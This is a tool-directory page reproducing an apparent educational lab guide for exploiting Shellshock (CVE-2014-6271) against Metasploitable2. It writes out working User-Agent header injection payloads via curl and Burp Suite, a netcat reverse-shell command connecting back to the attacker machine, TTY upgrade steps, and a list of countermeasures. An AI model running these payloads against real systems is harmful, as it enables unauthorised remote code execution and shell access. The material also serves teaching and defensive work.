Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2014-6271-Shellshock- — A complete, modern demonstration lab for CVE-2014-6271 (Shellshock), including architecture, exploitation steps, Burp Suite usage, reverse shells, countermeasures, and full command cheat-sheet. | Kitploit
Tools/GitHubGitHub/drhaitham/cve-2014-6271-shellshock-
Vulnerability AnalysisExploitationReverse EngineeringWeb Application ExploitationCTFPenetration TestingCommand and ControlLearning & EducationRed Teaming
Payload Development
Labs & Practice
GitHubdrhaitham/cve-2014-6271-shellshock-

CVE-2014-6271-Shellshock-

A complete, modern demonstration lab for CVE-2014-6271 (Shellshock), including architecture, exploitation steps, Burp Suite usage, reverse shells, countermeasures, and full command cheat-sheet.

View Repository
109 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Exploiting Shellshock (CVE-2014-6271): A Complete, Modern Demonstration Lab

Shellshock (CVE-2014-6271) is one of the most influential remote code execution vulnerabilities ever discovered. The flaw affects Bash and allows attackers to execute arbitrary commands simply by injecting crafted payloads into environment variables.

This guide provides a full, reproducible demonstration using:

  • Kali Linux (attacker)
  • Metasploitable2 (target)
  • curl, Burp Suite, Netcat
  • A manually created Bash-based CGI script

It is designed for teaching, research, training, and general cybersecurity awareness.


📌 Table of Contents

  1. Lab Architecture
  2. Creating the Vulnerable CGI Script
  3. Understanding the Shellshock Vulnerability
  4. Exploiting Shellshock with curl
  5. Exploiting Shellshock with Burp Suite
  6. Reverse Shell via Shellshock
  7. Upgrading to a Fully Interactive TTY
  8. Attack Chain Diagram
  9. Screenshot Gallery
  10. Countermeasures
  11. Cheat Sheet (All Commands)
  12. Exploiting Shellshock Using Metasploit
  13. Conclusion

1. Lab Architecture

ComponentRoleOSIP AddressKey Services
Kali LinuxAttackerKali Linux (latest)192.168.1.4curl, Burp Suite, Netcat
Metasploitable2Target vulnerable serverUbuntu Linux (MSF2)192.168.1.5Apache 2.2, CGI scripts, Bash
Apache mod_cgiScript executionRuns on MSF2n/aExposes Bash via CGI
shellshock.shVulnerable entrypointBash CGIn/aDisplays environment variables

This simple two-node setup mirrors many legacy deployments still present in industrial and IoT systems.


2. Creating the Vulnerable CGI Script

On Metasploitable2:

sudo su
cd /usr/lib/cgi-bin/

cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF

chmod +x shellshock.sh
a2enmod cgi
service apache2 restart

Test the script from Kali:

curl http://192.168.1.5/cgi-bin/shellshock.sh

You should see environment variables displayed.


3. Understanding the Shellshock Vulnerability

Shellshock occurs when Bash incorrectly parses environment variables that resemble function definitions.

A malicious variable such as:

() { :; }; /bin/bash -c "id"

will cause Bash to execute the command after the function definition — even though the function itself is never invoked.

CGI applications are especially vulnerable because HTTP headers are automatically passed to scripts as environment variables.


4. Exploiting Shellshock with curl

curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh

Output should include:

Vulnerable
uid=33(www-data)

This confirms remote code execution.


5. Exploiting Shellshock with Burp Suite

5.1 Send Normal Request

Visit:

http://192.168.1.5/cgi-bin/shellshock.sh

Send the request to Repeater.

5.2 Inject Shellshock Payload

Replace the User-Agent header with:

User-Agent: () { :; }; echo; echo BurpTest; /bin/bash -c "id"

5.3 Response

You should see:

BurpTest
uid=33(www-data)

Burp Suite confirms the vulnerability in a visual and educational way.


6. Reverse Shell via Shellshock

Start listener on Kali:

nc -lvnp 4444

Trigger reverse shell via the CGI script:

curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh

A shell will connect back to Kali.


7. Upgrading to a Fully Interactive TTY

Inside the reverse shell:

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Suspend the session:

Ctrl + Z

On Kali:

stty raw -echo; fg

Press Enter.

You now have:

  • tab completion
  • arrow keys
  • job control
  • full interactive Bash

8. Attack Chain Diagram

          ┌────────────────────────┐
          │     Attacker (Kali)    │
          │      192.168.1.4       │
          └───────────┬────────────┘
                      │
     1. Malicious HTTP Header (Shellshock)
                      │
                      ▼
        ┌──────────────────────────┐
        │ Apache Web Server (CGI)  │
        │     192.168.1.5          │
        └───────────┬──────────────┘
                    │
   2. Header → CGI Environment Variable
                    │
                    ▼
      ┌──────────────────────────┐
      │     Bash (Vulnerable)    │
      └───────────┬──────────────┘
                  │
      3. Injected Command Executes
                  │
                  ▼
        ┌─────────────────────────┐
        │  www-data Shell Access  │
        └───────────┬─────────────┘
                    │
        4. Reverse Shell → Kali
                    │
                    ▼
      ┌──────────────────────────┐
      │ Full Interactive TTY     │
      └──────────────────────────┘

9. Screenshot Gallery

A visual walkthrough of key stages of the attack.

DescriptionImage
Nmap scan + Shellshock test output
Burp Suite – Initial Shellshock request
Burp Suite – Payload / header injection
Reverse shell received on Kali (nc)

10. Countermeasures

✔ 1. Upgrade Bash

Patch to a version that correctly handles function parsing.

✔ 2. Disable CGI

Legacy CGI introduces unnecessary systemic risk.

✔ 3. Sanitise HTTP Headers

Drop suspicious patterns such as:

() { :; };

✔ 4. Use Least Privilege

Restrict web server user (www-data) permissions.

✔ 5. Outbound Connection Restrictions

Stops reverse shells and data exfiltration.

✔ 6. Deploy a Web Application Firewall (WAF)

Modern WAF signatures detect Shellshock immediately.

✔ 7. Enable SELinux / AppArmor

Contains Bash processes and blocks unintended behaviour.

✔ 8. Run Regular Vulnerability Scans

Use tools such as:

  • Nessus
  • OpenVAS
  • Nikto
  • Nmap NSE (http-shellshock.nse)

11. Cheat Sheet (All Commands)

Target Setup

sudo su
cd /usr/lib/cgi-bin/
cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF
chmod +x shellshock.sh
a2enmod cgi
service apache2 restart

Test CGI

curl http://192.168.1.5/cgi-bin/shellshock.sh

Download Tool